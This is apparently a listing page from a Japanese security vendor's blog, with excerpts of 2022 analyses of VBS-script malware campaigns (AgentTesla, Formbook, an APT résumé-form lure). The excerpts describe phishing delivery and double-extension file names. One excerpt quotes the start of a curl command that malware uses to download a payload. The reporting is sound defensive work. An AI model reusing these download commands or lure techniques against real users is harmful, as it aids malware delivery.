VBS を通じて拡散している AgentTesla Posted By Hansoyoung , 2022年 October 31日 ASEC 分析チームは最近、不正な VBS を通じて AgentTesla が拡散していることを確認した。スクリプトファイルには多数のコードが複数回にわたって難読化されているという特徴がある。AgentTesla は今年5月に Windows ヘルプファイル(*.chm)による配布が確認された履歴があり、持続的に配布方式を変更しているものと思われる。 https://asec.ahnlab.com/jp/34817/ VBS スクリプトはメールに圧縮ファイル形式で添付して配布される。最近では、韓国国内の企業を騙った配布メールも確認された。…
誕生日を祝う内容に偽装した不正なアレアハングルドキュメント (OLE オブジェクト) Posted By Hansoyoung , 2022年 September 1日 ASEC 分析チームは最近、不正なアレアハングルファイルをダウンロードする VBScript を確認した。このマルウェアの正確な配布経路は確認されていないが、VBScript は curl を通じてダウンロードされる。 現在確認されているコマンドは以下の通りである。 curl -H \”user-agent: chrome/103.0.5060.134 safari/537.32\”…
脱北者の履歴書フォームを装った APT 攻撃 (VBS スクリプト) Posted By Hansoyoung , 2022年 April 1日 ASEC 分析チームは最近、対北朝鮮関連の内容のフィッシングメールを通じて、情報流出を目的とした不正な VBS が拡散していることを確認した。対北朝鮮関連の放送出演オファーの内容が記載されており、圧縮ファイルが添付されている。履歴書の作成について言及しており、添付されたファイルの実行を誘導している。圧縮ファイルの中には不正な VBS スクリプトファイルが存在する。 「2022 履歴書フォーム.vbs」ファイルの簡略化した振る舞いは以下の通りである。 情報収集および転送 正常なアレアハングルファイルの生成 追加の不正なスクリプトファイルの生成およびタスクスケジューラの登録 VBS…
見積書偽装マルウェアの配布方式における変化 (VBS スクリプト) Posted By Hansoyoung , 2022年 February 28日 ASEC 分析チームは、昨年に特定会社の名前が含まれたファイル名によって配布されていた Formbook マルウェアが、最近 VBS ファイルによって配布されていることを確認した。配布が確認されたメールには以前と同様、見積書の要請に関する内容が記載されており、添付ファイル名には特定会社の名前を含むことで、ユーザーが添付ファイルを開くように誘導している。 メールに添付された圧縮ファイルには、実行ファイルではなく VBS ファイルが存在する。 この不正なファイルは、同じ会社名で配布日付のみ異なるファイル名で配布されていることが確認されている。現在までに配布が確認されたファイル名は以下の通りである。 韓*産業開発(2022.02.03).pdf.vbs 韓*産業開発(2022.02.04).pdf.vbs…